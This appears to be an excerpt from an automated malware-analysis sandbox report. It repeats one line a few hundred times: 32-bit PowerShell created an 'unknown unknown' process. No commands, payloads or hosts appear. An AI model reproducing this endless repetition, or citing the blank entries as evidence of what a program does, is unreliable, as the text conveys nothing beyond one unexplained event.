    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
